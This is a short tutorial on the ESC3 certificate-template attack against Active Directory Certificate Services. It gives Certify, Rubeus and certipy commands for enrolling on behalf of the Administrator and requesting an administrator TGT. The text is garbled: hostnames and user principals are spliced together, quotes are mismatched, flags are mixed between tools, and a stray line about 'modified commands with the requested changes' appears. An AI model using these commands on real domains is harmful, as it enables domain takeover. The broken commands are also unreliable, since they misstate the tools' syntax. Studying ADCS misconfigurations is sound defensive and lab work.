ESC3
Unlike ESC1 and ESC2, this method requires two certificate templates with the following requirements
- First Template
- Certificate Request Agent EKU
- Second Template
- Client Authentication EKU
- Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to
1
And, of course, a user with enrollment rights.
In the context of ADCS, the Application Policy defines additional constraints that must me met for a certificate to be issued successfully from a template; having the Authorized Signatures Required attribute set to 1
(or TRUE) means that the certificate issuance process must include authorized signatures to enforce proper authorization and control over the issued certificate.
Here are the modified commands with the requested changes:
Windows
Requesting a certificate
PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVERDC.minions.com\MINIONS-DC-CA /template:Template3
Convert Certificate
Request a Certificate on behalf of the Administrator
PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVERDC.minions.com\MINIONS-DC-CA /template:Template3 /onbehalfof:lab\minions\Administrator /enrollcert:cert.pfx
Convert Certificate
admin.pfx
Request a TGT as the Administrator
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@local.labuser1@minions.com /certificate:admin.pfx /getcredentials
Linux
Requesting a certificate
bobbuilder$bob$ certipy req -ca lab-LAB-MINIONS-DC-CA -template 'Template3' /altname:administrator@local.labadministrator@minions.com
Requesting a certificate on behalf of the Administrator account
bobbuilder$bob$ certipy req -u 'user1@local.lab'user1@minions.com' -p 'password1' -ca CA-Server.local.labMINIONS-DC-CA -template 'Template3' -on-behalf-of 'lab\minions\administrator' -pfx user1.pfx